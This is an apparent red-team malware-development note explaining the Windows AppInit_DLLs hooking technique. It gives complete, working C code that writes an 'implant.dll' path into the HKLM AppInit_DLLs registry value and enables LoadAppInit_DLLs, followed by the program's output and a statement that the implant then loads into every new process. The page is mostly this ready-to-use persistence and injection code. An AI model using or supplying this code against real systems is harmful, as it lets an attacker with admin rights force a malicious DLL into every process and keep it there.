Red Team Notes logo Red Team Notes

Maldev-Hooking

AppInit

AppInit (Application Initialization) is an infrastructure designed to allow developers to run custom code or modify the behavior of processes during the initialization phase of applications. It was primarily used in Windows operating systems prior to Windows 8.

So every process whill check the following two registers at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs

If LoadAppInit_DLLs is set to 1 will load the dll specified on AppInit_DLLs registry.

Note: Local admin needed to modify HLKM registries.

So we just need to modify both registries:

Code

#include <windows.h>
#include <stdio.h>
#include <winreg.h>

#pragma comment(lib, "Advapi32.lib")

int main(void) {

    HKEY hKey;
    char * AppInit_data = "c:\\tools\\rtnotes\\implant.dll";
    DWORD LoadInit_data = 0x1;
    DWORD bytesOut = 0;

    LSTATUS stat = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, KEY_READ | KEY_SET_VALUE, &hKey);
    if (stat == ERROR_SUCCESS)
        printf("[+] RegOpenKeyExA successfull!\n");
    else {
        printf("[!] Error accessing registry. Are you running as admin? (%d)!\n", stat);
        return -1;
    }

    //setting up AppInit_DLLs
    stat = RegSetValueExA(hKey, "AppInit_DLLs", 0, REG_SZ, (BYTE *) AppInit_data, strlen(AppInit_data));
    if (stat == ERROR_SUCCESS)
        printf("[+] AppInit_DLLs modified\n");
    else {
        printf("[!] Error accessing registry. Are you running as admin? (%d)!\n", stat);
        RegCloseKey(hKey);
        return -1;
    }

    //setting up LoadAppInit_DLLs
    stat = RegSetValueExA(hKey, "LoadAppInit_DLLs", 0, REG_DWORD, (BYTE *) &LoadInit_data, sizeof(LoadInit_data));
    if (stat == ERROR_SUCCESS)
        printf("[+] LoadAppInit_DLLs modified\n");
    else {
        printf("[!] Error accessing registry. Are you running as admin? (%d)!\n", stat);
        RegCloseKey(hKey);
        return -1;
    }

    RegCloseKey(hKey);
    return 0;
}

After the execution we can manually check the registries and see that our implant.dll is successfully added to the AppInit_DLLs registry hive.

C:\Tools\rtnotes>.\rtnotes.exe
[+] RegOpenKeyExA successfull!
[+] AppInit_DLLs modified
[+] LoadAppInit_DLLs modified

Finally we can launch any proccess for example a notepad and we can check that the implant.dll is successfuly loaded to each new process.

Note: Remember to change to 0 the HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs registry to 0 to stop loading the DLL.